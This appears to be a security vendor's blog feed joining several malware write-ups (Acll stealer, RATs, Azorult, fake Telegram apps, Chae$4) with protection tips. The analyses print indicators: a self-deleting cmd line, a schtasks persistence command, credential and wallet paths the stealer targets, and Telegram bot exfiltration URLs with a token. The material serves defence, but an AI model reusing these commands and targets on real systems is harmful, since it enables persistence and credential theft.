"%ComSpec%" /c taskkill /im "%SAMPLENAME%" /f & erase "%SAMPLEPATH%" & exit

Difference Between Password Stealer and Spyware

Password stealers and spyware may look similar, but have some fundamental differences. The first difference lies in the principle of operation: stealer works quietly and quickly, often sticking to “steal and leave” tactics. Spyware, on the other hand, aims at a long and permanent presence in the system. Although some stealers can take screenshots and capture keyboard inputs in addition to collecting sensitive data, this is not the main functionality.

Spyware, on the other hand, can stay on an infected system for months and continuously collect data. This includes screenshots, capturing keystrokes, and camera and microphone recordings. This data is sent periodically or in real-time to the attacker’s server.

Safety Recommendations

Malware and password stealers in particular tend to become more and more sophisticated. Getting harder to detect, picking new spreading ways, collecting more and more data – all this makes them a menace to be aware about. Fortunately, the ways to prevent this from getting into your PC is not particularly hard.

  • Be careful with email attachments. This method is still the leading method among successful malware infections. Do not open attachments or click on links if the email has a suspicious sender or is not the email you were intentionally expecting.
  • Avoid cracked software. Pirated software is illegal in itself, but it carries serious risks. Attackers embed malicious code in “repacks”, as installing most hacked programs requires disabling security software.
  • Use security software. A reliable antimalware solution is essential because it can prevent malware from running and installing in case of user error. In addition, it will generally provide comprehensive protection by significantly reducing infection vectors. In addition, advanced solutions such as GridinSoft Anti-Malware have an Internet Security module that blocks potentially malicious sites.

The post Password Stealer appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/password-stealer/feed/ 0 1843
Trojan:Win32/Acll https://gridinsoft.com/blogs/trojan-win32-acll/ https://gridinsoft.com/blogs/trojan-win32-acll/#respond Thu, 23 May 2024 10:46:11 +0000 https://gridinsoft.com/blogs/?p=22298 Trojan:Win32/Acll is a stealer malware detected by Microsoft Defender. It targets sensitive information, login credentials, personal details, and financial data. It spreads through pirated software, malicious ads, or bundles. Trojan:Win32/Acll Overview Trojan:Win32/Acll is a stealer-type malicious software coded in Python. It is designed to extract and transmit sensitive information from devices. Such malware targets a… Continue reading Trojan:Win32/Acll

The post Trojan:Win32/Acll appeared first on Gridinsoft Blog.

]]>
Trojan:Win32/Acll is a stealer malware detected by Microsoft Defender. It targets sensitive information, login credentials, personal details, and financial data. It spreads through pirated software, malicious ads, or bundles.

Trojan:Win32/Acll Overview

Trojan:Win32/Acll is a stealer-type malicious software coded in Python. It is designed to extract and transmit sensitive information from devices. Such malware targets a wide range of data, including system information, login credentials, personal details, and financial data. In addition to extracting data from various applications such as browsers, email clients, messengers, and others, Trojan:Win32/Acll can grab files, do keylogging, manipulate clipboards, and perform other spyware functionalities.

Trojan:Win32/Acll detection window screenshot
Trojan:Win32/Acll detection window

It spreads through ways typical for other spyware – malicious email attachments and pirated applications. However, some of the samples appear to mimic hardware management tools, specifically fan controlling utilities and UEFI parameter modifiers. In this way, malware can obtain highest privileges, as such software commonly requires root-level access to work.

Technical Analysis

Let’s look at how Trojan:Win32/Acll behaves in the system. Despite most of the samples being a rather recent discovery, there are quite a few researches upon each of them, meaning that the malware is pretty widespread. Before starting its dirty deeds, it performs checks for the signs of virtualization in the environment. This reconnaissance helps Acll to avoid analysis or sandboxing. Malware checks the following locations:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy

These keys contain the user’s certificate stores, enforce the use of cryptographic algorithms, and control various aspects of system behavior and security. Malware also uses code obfuscation and other tricks to avoid detection.

Mutex Creation & Privilege Escalation

After reassuring it is not running in a compromising environment, Trojan:Win32/Acll creates mutexes to prevent more than one instance from running at the same time:

Local\SM0:3648:304:WilStaging_02
Local\SM0:5144:304:WilStaging_02

Then, the malware manipulates files and adds itself to the Task Scheduler to provide regular startups. Also, it creates entries in the Run registry keys, making the system run the malware upon startup.

schtasks /create /f /RU "%USERNAME%" /tr "%ProgramData%\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
HKEY_USERS\%SID%\Software\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5

Creating these hooks finalizes the preparations, as the malware then switches to loading DLLs and launching at its full power. By using the C:\Windows\System32\wuapihost.exe -Embedding command, Acll performs sideloading and is ready to the next step.

Data Collection

As I said before, Trojan:Win32/Acll is an infostealer, with a specific target on sensitive user data and cryptocurrency wallets. The malware attempts to collect credentials as a hash or password in plaintext. In addition to searching on the device, it tries to retrieve passwords from shared password storage locations and browser folders. Acll checks the following locations:

C:\Program Files\Common Files\SSL\openssl.cnf
C:\Users\\AppData\Local\Google\Chrome\User Data\
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\
C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data
C:\Users\user\AppData\Local\Vivaldi\User Data
C:\Users\user\AppData\Roaming\Opera Software\Opera GX Stable
C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data

Further, it switches to desktop cryptocurrency wallets. The list of targeted ones is not massive, but I am sure it is just the matter of time for this malware to start targeting others.

C:\Program Files\Common Files\SSL\cert.pem
C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
C:\Users\user\AppData\Roaming\Electrum\wallets
C:\Users\user\AppData\Roaming\Ethereum\keystore
C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
C:\Users\user\AppData\Roaming\bytecoin

Same story is about FTP and VPN credentials. Reviewed samples targeted only FileZilla, OpenVPN and NordVPN (if targeted them at all), but such functionality is not hard to implement. I would still recommend to reset all the passwords that were kept in this or another way on the affected device.

Data Exfiltration

After collecting the information, Trojan:Win32/Acll sends it to C2. Several Win32/Acll samples use the Telegram bot as an intermediate server, as evidenced by its network activity:

https://api.telegram[.]org/bot7006468177:AAEjUyc53owWdXWMasYo_ZE1Y7t2sH1O718/sendMessage
https://api.telegram.org/bot7006468177:AAEjUyc53owWdXWMasYo_ZE1Y7t2sH1O718/sendDocument

In addition to Telegram, the malware uses various cloud services, including OneDrive, Microsoft Azure, EdgeCast (Verizon Media), and others. Here is the list of IP addresses:

TCP 204.79.197.203:443
TCP 34.117.186.192:443
TCP 149.154.167.220:443
TCP 20.99.186.246:443

How To Remove Trojan:Win32/Acll?

To remove Trojan:Win32/Acll, I recommend using GridinSoft Anti-Malware, which you can download and install from the link below. After installation, run a Full scan and let it finish, so the program will find all the malware-related files. In addition to malware removal, GridinSoft Anti-Malware can provide proactive protection and internet security. This will help prevent malware installation even at the download stage.

Trojan:Win32/Acll

The post Trojan:Win32/Acll appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/trojan-win32-acll/feed/ 0 22298
Remote Access Trojan (RAT) https://gridinsoft.com/blogs/remote-access-trojan-meaning/ https://gridinsoft.com/blogs/remote-access-trojan-meaning/#respond Thu, 16 May 2024 02:11:57 +0000 https://gridinsoft.com/blogs/?p=12845 Remote Access Trojan is software that allows unauthorized access to a victim’s computer or covert surveillance. Remote Access Trojan are often disguised as legitimate programs and give the attacker unhindered access. Their capabilities include tracking user behavior, copying files, and using bandwidth for criminal activity. What is a Remote Access Trojan (RAT)? A Remote Access… Continue reading Remote Access Trojan (RAT)

The post Remote Access Trojan (RAT) appeared first on Gridinsoft Blog.

]]>
Remote Access Trojan is software that allows unauthorized access to a victim’s computer or covert surveillance. Remote Access Trojan are often disguised as legitimate programs and give the attacker unhindered access. Their capabilities include tracking user behavior, copying files, and using bandwidth for criminal activity.

What is a Remote Access Trojan (RAT)?

A Remote Access Trojan (RAT) is a malicious program that opens a backdoor, allowing an attacker to control the victim’s device completely. Users often download RATs with a legitimate program, i.e., inside of hacked games from torrents or within an email attachment. Once an attacker compromises the host system, it can use it to spread RATs to additional vulnerable computers, thus creating a botnet. In addition, RAT can be deployed as a payload using exploit kits. Once successfully deployed, RAT directly connects to the command-and-control (C&C) server the attackers control. They achieve this by using a predefined open TCP port on the compromised device. Because the RAT provides administrator-level access, an attacker can do almost anything on a victim’s computer, such as:

  • Use spyware and keyloggers to track the victim’s behavior
  • Gain access to sensitive data, including social security numbers and credit card information
  • View and record video from a webcam and microphone
  • Take screenshots
  • Format disks
  • Download, change or delete files
  • Distribute malware and viruses

How does a Remote Access Trojan work?

Like any other type of malware, a RAT can be attached to an email or posted on a malicious website. Cybercriminals can also exploit a vulnerability in a system or program. RAT is similar to Remote Desktop Protocol (RDP) or Anydesk but differs in its stealth. RAT establishes a command and control (C2) channel with the attacker’s server. This way, attackers can send commands to RAT, and it can return the data. RATs also have a set of built-in controls and methods for hiding their C2 traffic from detection.

Remote access trojan mechanism

RATs can be combined with additional modules, providing other capabilities. For example, suppose an attacker may gain a foothold using a RAT. Then, after examining the infected system with the RAT, he decides he needs to install a keylogger. Depending on his needs, RAT may have a built-in keylogging feature or the ability to download and add a keylogger module. It can also load and run an independent keylogger.

Why Remote Access Trojan is Dangerous?

A 2015 incident in Ukraine illustrates the nefarious nature of RAT programs. At the time, attackers used remote-control malware to cut power to 80,000 people. As a result, they gained remote access to a computer authenticated in the SCADA (supervisory control and data collection) machines that controlled the country’s utility infrastructure. In addition, Remote Access Trojan allowed attackers to access sensitive resources by bypassing the elevated privileges of the authenticated user on the network. Thus, an attack using RATs can take on a threatening scale, up to the threat to national security.

Unfortunately, cybersecurity teams often have difficulty detecting RATs. This is because malware typically carries many concealing features, allowing it to avoid any detection. In addition, RATs manage resource utilization levels so that there is no performance degradation, making it difficult to detect the threat.

Ways of using Remote Access Trojan

The following are ways in which a RAT attack can compromise individual users, organizations, or even entire populations:

  • Spying and blackmail: An attacker who has deployed a RAT on a user’s device gains access to the user’s cameras and microphones. Consequently, he can take pictures of the user and his surroundings and then use this to launch more sophisticated attacks or blackmail.
  • Launch Distributed Denial of Service (DDoS) Attacks: Attackers install RATs on many user devices, then use those devices to flood the target server with spoofed traffic. Even though the attack can cause network performance degradation, users are often unaware that hackers use their devices for DDoS attacks.
  • Cryptomining: In some cases, attackers can use RATs to mine cryptocurrency on the victim’s computer. By scaling this action to many devices, they can make huge profits.
  • Remote file storage: Sometimes attackers can use RATs to store illegal content on unsuspecting victims’ machines. That way, authorities can’t shut down the attacker’s account or storage server because he keeps information on devices belonging to legitimate users.

  • Industrial Systems Compromise: As described above, attackers can use RATs to gain control over large industrial systems. These could be utilities such as electricity and water supplies. As a result, an attacker can cause significant damage to the industrial equipment by sabotaging these systems and disrupting critical services in entire areas.

Remote Access Trojan Examples

njRAT

NjRAT is probably the most known and the oldest among remote-access trojans. Appeared in 2012, it keeps getting updates, which adjust its functionality to the modern “standards”, which makes up for its longevity. The reason for this is probably the attention from state-sponsored threat actors – APT36 and APT41 – who use it in cyberattacks almost since its very inception.

Njrat interface
Interface of njRAT 0.7 Golden edition

Key functionality of njRAT is typical for pretty much any remote-access trojan – it is about providing remote access. The latter is topped up with uploading and downloading files by command, log keystrokes and capture microphone and camera inputs. Some of its variants are also capable of grabbing credentials from browsers and cryptocurrency apps.

One interesting feature of this remote access trojan is its naming. Threat analysts use its original name interchangeably with Bladabindi. The latter is a detection name that Microsoft assigned to this trojan back in its early days. Usually, Redmond changes the naming as the malware gains volume and power, but this did not happen here.

Sakula

Sakula is seemingly harmless software with a legitimate digital signature. However, the malware first appeared in 2012 and is used against high-level targets. It allows attackers to take full advantage of remote administration on the device and uses simple unencrypted HTTP requests to communicate with the C&C server. Additionally, it uses a Mimikatz password stealer to authenticate using a hash transfer method that reuses operating system authentication hashes to hijack existing sessions.

KjW0rm

KjW0rm is a worm written in VBS in 2014 that uses obfuscation, making it difficult to detect on Windows computers. It has many variations; the older parent version is called “Njw0rm”. The malware and all other variants belong to the same family, with many features and similarities in its workflow. It deploys stealthily and then opens a backdoor that allows attackers to gain complete control of the machine and send data back to the C&C server.

Havex

Havex is a Remote Access Trojan discovered in 2013 as part of a large-scale spying campaign targeting production control systems (ICS) used in many industries. Its author is a hacker group known as Dragonfly and Energetic Bear. It gives attackers complete control over industrial equipment. Havex uses several mutations to avoid detection and has a minimal footprint on the victim’s device. It communicates with the C&C server via HTTP and HTTPS protocols.

Agent.BTZ/ComRat

Agent.BTZ/ComRat (also called Uroburos) is a Remote Access Trojan that became infamous after hackers used it to break into the U.S. military in 2008. The first version of this malware was probably released in 2007 and had worm-like properties, spreading via removable media. From 2007 to 2012, developers released two significant versions of RAT. Most likely, this is a development of the Russian government. It can be deployed via phishing attacks and uses encryption, anti-analysis, and forensic techniques to avoid detection. In addition, it provides complete administrative control over the infected machine and can transmit data back to its C&C server.

Dark Comet

Backdoor.DarkComet is a Remote Access Trojan application that runs in the background and stealthily collects information about the system, connected users, and network activity. This Remote Access Trojan was first identified in 2011 and is still actively used today. It provides complete administrative control over infected devices. For example, it can disable task manager, firewall, or user access control (UAC) on Windows machines. In addition, Dark Comet uses encryption, thereby avoiding detection by antivirus.

AlienSpy

AlienSpy is a RAT that supports multiple platforms. This allows payload creation for Windows, Linux, Mac OS X, and Android operating systems. It can collect information about the target system, activate the webcam, and securely connect to the C&C server, providing complete control over the device. In addition, AlienSpy uses anti-analysis techniques to detect the presence of virtual machines. According to the researcher who analyzed the threat, the operator behind the author of the service is a native Spanish speaker, probably Mexican.

Heseber BOT

The Heseber BOT is based on the traditional VNC remote access tool. It uses VNC to remotely control the target device and transfer data to the C&C server. However, it does not provide administrative access to the machine unless the user has such permissions. Since VNC is a legitimate tool, Haseber antivirus tools do not identify it as a threat.

Sub7

Sub7 is a Remote Access Trojan that runs on a client-server model. The backdoor was first discovered in May 1999 and ran on Windows 9x and the Windows NT family of operating systems up to Windows 8.1. The server is a component deployed on the victim machine, and the client is the attacker’s GUI to control the remote system. The server tries to install itself into a Windows directory and, once deployed, provides webcam capture, port redirection, chat, and an easy-to-use registry editor.

Back Orifice

Back Orifice is a Remote Access Trojan for Windows introduced in 1998. It supports most versions beginning with Windows 95 and is deployed as a server on the target device. It takes up little space, has a GUI client, and allows an attacker to gain complete control over the system. RAT can also use image processing techniques to control multiple computers simultaneously. The server communicates with its client via TCP or UDP, usually using port 31337.

How To Protect Against Remote Access Trojan?

As stated above, Remote Access Trojans rely on their stealthiness. Once it has appeared, you will likely struggle to detect it, even if the exact malware sample is not new. That’s why the best way to protect against Remote Access Trojan is to not even give it a chance to run. The following methods represent proactive actions that severely decrease the chance of malware introduction and the possibility of getting in trouble.

Security training

Unfortunately, the weakest link in any defense is the human element, which is the root cause of most security incidents, and RATs are no exception. Therefore, it’s strategy for defending against RATs depends on organization-wide security training. In addition, victims usually launch this malware through infected attachments and links in phishing campaigns. Therefore, employees must be vigilant not to contaminate the company network and jeopardize the entire organization accidentally.

Using multi-factor authentication (MFA)

Since RATs typically try to steal passwords and usernames for online accounts, using MFA can minimize the consequences if a person’s credentials are compromised. The main advantage of MFA is that it provides additional layers of security and reduces the likelihood that a consumer’s identity will be compromised. For example, suppose one factor, such as the user’s password, is stolen or compromised. In that case, the other factors provide an additional layer of security.

Strict access control procedures

Attackers can use RATs to compromise administrator credentials and gain access to valuable data on the organization’s network. However, with strict access controls, you can limit the consequences of compromised credentials. More stringent rules include:

  • More strict firewall settings
  • Safelisting IP addresses for authorized users
  • Using more advanced antivirus solutions

Solutions for secure remote access

Every new endpoint connected to your network is a potential RAT compromise opportunity for attackers. Therefore, to minimize the attack surface, it’s important to only allow remote access through secure connections established through VPNs or security gateways. You can also use a clientless solution for remote access. It does not require additional plug-ins or software on end-user devices, as these devices are also targets for attackers.

Zero-trust security technologies

Recently, zero-trust security models have grown in popularity because they adhere to the “never trust, always verify” principle. Consequently, the zero-trust security approach offers precise control over lateral movements instead of full network access. It is critical to suppressing RAT attacks, as attackers use lateral moves to infect other systems and access sensitive data.

Focus on infection vectors

Like other malware, Remote Access Trojan is a threat only if installed and implemented on the target computer. Using secure browsing, anti-phishing solutions, and constantly patching systems can minimize the likelihood of RAT. Overall, these actions are a good tone for improving security for any case, not only against Remote Access Trojans.

Pay attention to abnormal behavior

RATs are Trojans that may present themselves as legitimate applications but contain malicious features associated with the actual application. Tracking the application and system for abnormal behavior can help identify signs that might indicate a Remote Access Trojan.

Monitoring network traffic

An attacker uses RATs to remotely control an infected computer over the network. Consequently, a RAT deployed on a local device communicates with a remote C&C server. Therefore, you should pay attention to unusual network traffic associated with such messages. In addition, it would be best to use tools such as web application firewalls to monitor and block C&C messages.

Implement least privilege

The concept of least privilege implies that applications, users, systems, etc., should be restricted to the permissions and access they need to do their jobs. Therefore, using the least privilege can help limit an attacker’s actions with RAT.

Are Remote Access Trojans illegal?

Well, yes, but actually, no. It all depends on how and what you use it for. It is not the program itself that makes such tasks illegal. It’s the implementation. You can test and execute if you’ve written a Remote Access Trojan and have a home lab. You can use it if you have written permission from the other party. However, if you use the RAT maliciously, you may face some legal problems. So, to distinguish, professionals use the term “remote access tools” for legitimate access and control and “remote access trojan” for illegitimate access and control.

The post Remote Access Trojan (RAT) appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/remote-access-trojan-meaning/feed/ 0 12845
AzorUlt Stealer Is Back In Action, Uses Email Phishing https://gridinsoft.com/blogs/azorult-stealer-back-in-action/ https://gridinsoft.com/blogs/azorult-stealer-back-in-action/#respond Tue, 16 Jan 2024 12:22:45 +0000 https://gridinsoft.com/blogs/?p=19052 Cybersecurity experts have stumbled upon the eight-year-old Azorult malware. This malware steals information and collects sensitive data, and has been down since late 2021. But will the old dog keep up to new tricks? Azorult Malware Resurfaces After 2 Years A recent research in the cyber threat landscape has brought to light concerning news about… Continue reading AzorUlt Stealer Is Back In Action, Uses Email Phishing

The post AzorUlt Stealer Is Back In Action, Uses Email Phishing appeared first on Gridinsoft Blog.

]]>
Cybersecurity experts have stumbled upon the eight-year-old Azorult malware. This malware steals information and collects sensitive data, and has been down since late 2021. But will the old dog keep up to new tricks?

Azorult Malware Resurfaces After 2 Years

A recent research in the cyber threat landscape has brought to light concerning news about the Azorult malware. First identified in 2016, this malware gained quite an image back in the days>. Among its most noticeable campaigns is spreading together with STOP/Djvu ransomware. However, its activity was declining since early 2020, with activity curve going flat in late 2021.

Being a stealer malware from the mid-10’s, it originally carried functionality that suited the times. Azorult specializes in stealing sensitive information. It includes things such as browsing history, cookies, and login credentials. No crypto wallets, no session and 2FA tokens – those were not that valuable back in the days.

Among the key news of the resurfaced version are more sophisticated and stealthy methods, which could make it very difficult to detect. It also uses a new infection chain and uses RAM as a springboard for deploying and executing the entire payload. Researchers stumbled upon shortcut files masquerading as PDF files, eventually leading to Azorult infecting the device. As for the distribution method, experts suggest using classic means like email phishing.

Malicious shortcut file screenshot
Malicious shortcut file

What is Azorult Malware?

The Azorult malware is a spyware that can steal various data types, including credentials for applications and cryptocurrencies. It is known for its capabilities in harvesting sensitive data from infected systems. Azorult can also download and execute additional payloads, increasing its threat to compromised systems.

In its latest variant, Azorult uses process injection and “Living Off the Land” (LotL) techniques to evade detection by security tools and is primarily sold on Russian underground hacker forums. Data stolen with Azorult is also sold on Russian Dark Web marketplaces. In addition to stealing information, >the malware captured data for a service that sells ready-made virtual identities. This included as much detailed data as possible about users’ online behavior: history of website visits, information about the operating system, browser, installed plugins, etc.

In particular, researchers found that 90% of all digital footprints provided on an infamous Genesis Market were associated with Azorult. However, in February 2020, Google released a Chrome update that enforced the use of AES-256 for password encryption. This affected Azorult ability to retrieve passwords from Chrome. As the development of AZORult was discontinued in 2018, this release was concidered a “death” of AZORult, impacting Genesis’s business as well.

Azorult Uses Email Spam and LNK Files

The reviewed example of Azorult, as I mentioned above, came as an .lnk file disguised as a PDF document through the double extension tricks. A file named citibank_statement_dec_2023.lnk triggers a sequence of events that downloads and executes a JavaScript file from a remote server. The JavaScript file downloads two PowerShell scripts, one of which retrieves an executable file and initiates a new thread to execute the injected code. The loader file terminates if the user’s language code matches specific codes linked to Russia – the most probable region of its developers. The final payload is, obviously, the Azorult infostealer.

Azorult Infection Chain image
Azorult Infection Chain

Upon execution, it generates a unique identifier for the victim and collects system information, including crypto wallets. Azorult terminates execution if certain conditions are met, such as the presence of a mutex or a file named “password.txt” on the Desktop. It also checks for specific machine names and usernames on the victim’s system. If any of the checks return true, the binary terminates. Azorult captures screenshots and targets multiple applications. The data is compressed, encrypted, and sent to a remote server.

Safety Recommendations

Since human error is mostly to blame, the most important recommendation is to beware of phishing. To elaborate, the following points will be helpful:

  • Unsolicited Emails. Always be skeptical and cautious of emails from unknown sources. Especially those that request personal information or urge you to click on a link.
  • Verify Email Sources. Before responding or clicking any links, verify the sender’s email address and ensure it’s legitimate. Don’t click on links in emails, especially if they seem suspicious or too good to be true.
  • Educate Yourself. Stay informed about phishing methods and various phishing-based scam techniques.

The post AzorUlt Stealer Is Back In Action, Uses Email Phishing appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/azorult-stealer-back-in-action/feed/ 0 19052
Spyware in Fake Telegram Apps Infected Over 10 million Users https://gridinsoft.com/blogs/fake-telegram-apps-spyware/ https://gridinsoft.com/blogs/fake-telegram-apps-spyware/#respond Tue, 12 Sep 2023 14:12:15 +0000 https://gridinsoft.com/blogs/?p=16863 It is important to exercise caution when using messenger mods. There have been reports of spyware disguised as modified versions of Telegram on the Google Play Store. This malware designed to extract sensitive information from compromised Android devices. Despite these risks, many users still blindly trust any app verified and published on Google Play. We… Continue reading Spyware in Fake Telegram Apps Infected Over 10 million Users

The post Spyware in Fake Telegram Apps Infected Over 10 million Users appeared first on Gridinsoft Blog.

]]>
It is important to exercise caution when using messenger mods. There have been reports of spyware disguised as modified versions of Telegram on the Google Play Store. This malware designed to extract sensitive information from compromised Android devices. Despite these risks, many users still blindly trust any app verified and published on Google Play. We have repeatedly warned about the dangers of downloading apps from Google Play. It could result in inadvertently downloading a Trojan, a backdoor, a malicious subscriber, and other harmful software.

Trojanized Telegram Clients Spread on Google Play

Telegram’s Play Store version is identified with the package name "org.telegram.messenger," while the direct APK file downloaded from Telegram’s website is associated with the package name "org.telegram.messenger.web". Malicious packages named “wab,” “wcb,” and “wob” were used by threat actors to trick users into downloading fake Telegram apps. Despite looking like the authentic Telegram app with a localized interface, infected versions contained an additional module. That was missed by Google Play moderators. A few days ago, experts revealed that a malware campaign called BadBazaar was using such rogue Telegram clients to gather chat backups.

Examples of fake Telegram apps:

Security experts have recently discovered a number of malicious apps on Google Play that claim to be versions of Telegram in Uyghur, Simplified Chinese, and Traditional Chinese languages. These apps have descriptions written in their respective languages and contain images that are very similar to the official Telegram page on Google Play, making it difficult to distinguish them from the genuine app.

The devs of these fake apps promote them as a faster version of a regular client, citing a distributed network of data centers worldwide. They use this as bait to persuade users to download the mods instead of the official Telegram app.

Examples of fake Telegram apps
Simplified Chinese, Traditional Chinese, and Uyghur versions of Telegram on Google Play with spyware inside

How dangerous are fake Telegram apps?

Millions of users have downloaded apps that were found to have malicious features. Among other things, malicious copies have functionality to capture and transmit sensitive information such as names, user IDs, contacts, phone numbers and chat messages to a server controlled by an unknown actor. Experts who discovered this activity have codenamed it Evil Telegram. Google has since taken down these apps from its platform.

Nonetheless, the poor app moderation problem in Google Play has persisted for almost a decade. You can upload literally whatever you want – even malware – and it may be deleted only after numerous reports saying it is malicious. And there’s still no guarantee that the reports will be processed in a suitable time; some rogue apps remain in GP for months. For that reason, the threat will most probably resurface later, especially considering the growing popularity of Telegram.

How to stay safe?

Here are some important tips to keep yourself safe from infected versions of popular messaging apps and other threats that target Android users:

  • As I’ve just said, Google Play isn’t completely immune to malware attacks. However, it’s still a much safer option than other sources, so always download and install apps from official stores.
  • Before installing any app, even from official stores, please take a closer look at its page and ensure it’s legitimate. Pay attention to the app’s name and developer. Cybercriminals frequently apply typosquatting or spoofing in order to spread their malware.
  • Reading negative user reviews is a good way to identify potential issues with an app. If there’s a problem with an app, someone has likely already written about it. Also try searching for reviews on the web. There are plenty of sites where you can leave your feedback without any censorship from the developer or Google. Using several independent sources will give a more clear view.

The post Spyware in Fake Telegram Apps Infected Over 10 million Users appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/fake-telegram-apps-spyware/feed/ 0 16863
Chae$4 Malware Released, Targets Banking & Logistic Orgs https://gridinsoft.com/blogs/chaes4-malware-update/ https://gridinsoft.com/blogs/chaes4-malware-update/#respond Thu, 07 Sep 2023 09:29:11 +0000 https://gridinsoft.com/blogs/?p=16749 Cybersecurity experts have discovered a new variant of Chaes malware called “Chae$4”. This malware targets the banking and logistics industries and significant content management platforms. New Chae$4 Malware Targets Banking and Logistic Industries. According to a report, researchers have discovered an advanced variant of Chaes malware that predominantly targets e-commerce customers in Latin America. Chae$4… Continue reading Chae$4 Malware Released, Targets Banking & Logistic Orgs

The post Chae$4 Malware Released, Targets Banking & Logistic Orgs appeared first on Gridinsoft Blog.

]]>
Cybersecurity experts have discovered a new variant of Chaes malware called “Chae$4”. This malware targets the banking and logistics industries and significant content management platforms.

New Chae$4 Malware Targets Banking and Logistic Industries.

According to a report, researchers have discovered an advanced variant of Chaes malware that predominantly targets e-commerce customers in Latin America. Chae$4 is an infostealer malware, discovered back in early 2023. Usually, it can be stealing bank data, intercepting bank payments, stealing personal data, and controlling infected computers. It is spread via phishing emails containing links or malicious code attachments. When the user opens the link or attachment, the malicious code is downloaded to the computer and installs Chae$4.

Once installed, Chae$4 monitors the user’s browser activity, including entering data into banking forms. The malware can also intercept bank payments and send them to attackers. Chae$4 can also be used to steal user’s personal information such as passwords, logins, and credit card numbers. It was named “Chae$4” because it was the fourth major malware version and had a debugging seal labeled Chaes in the main module. It threatens customers of well-known platforms and banks, including WhatsApp Web, MetaMask, Mercado Libre, Mercado Pago, Caixa Bank, and Itau Bank. Additionally, services such as WordPress, Magento, Drupal, and Joomla are affected.

What is Chaes Malware?

Chaes malware first appeared in mid-2020. It included using multiple programming languages and LOLbins and was adept at stealing sensitive financial data. In November of that year, experts published the first study of Chaes malware. The following research was published in January 2022 and indicated increased Chaes activity in the fourth quarter of 2021. In addition, the details of its behavior became known. Thus, the developers significantly improved the infection chain communication with C2 and added new integrations.

Chaes developer's response screenshot
Chaes developer’s response to researchers

In February 2022, Chaes malware developers published a response to the research. The attacker was impressed with the analysis and thanked the experts for their work. In addition, he specified that thanks to the analysis, he could fix the flaws that had been discovered. However, it is unclear whether one person or a group is behind the development of Chaes, as the address was addressed both in the person of one person and in the plural. However, the experts labeled the attacker “Lucifer” since the blog name and identifier for contacting C2 was “lucifer6”.

Chae$4 Malware Update – What’s New?

Since version 4 has been significantly revised, all of the above applies to the first three versions for the most part. In terms of the latest version, improvements include an improved code architecture and modularity, as well as new levels of encryption and stealth capabilities. In addition, the move to Python has resulted in lower detection rates by traditional means.

Seven different modules were identified during the analysis. These modules can be updated independently without changing the core functionality. The malware has several modules, including one for identification and data gathering, an online module for monitoring active victims, a credential stealer and clipper module, and modules for stealing data from specific banks and browsers. It also has a module for uploading files to the C2 server. This version has re-implemented previous modules with improved functionalities and unique techniques.

How to protect yourself against Chae$ 4?

Since Chae$ 4 is a fileless malware, meaning it does not create any files on the victim’s computer, making it more difficult to detect and remove. However, here are some tips on how to protect yourself against Chae$4:

  • Keep your software up to date. Software updates are an integral part of using any device. They include security patches that protect you from malware attacks.
  • Use a firewall. It will help prevent cyberattacks from outside. In other words, a firewall can block unauthorized access to your computer.
  • Back up your data regularly. This way, you can restore your data if infected with malware.
  • Use protecting software. Anti-malware solution will be the last line of defense and protect your device if you are not vigilant. It will detect and remove malware if it has infiltrated the machine.

Chae$4 Malware Released, Targets Banking & Logistic Orgs

The post Chae$4 Malware Released, Targets Banking & Logistic Orgs appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/chaes4-malware-update/feed/ 0 16749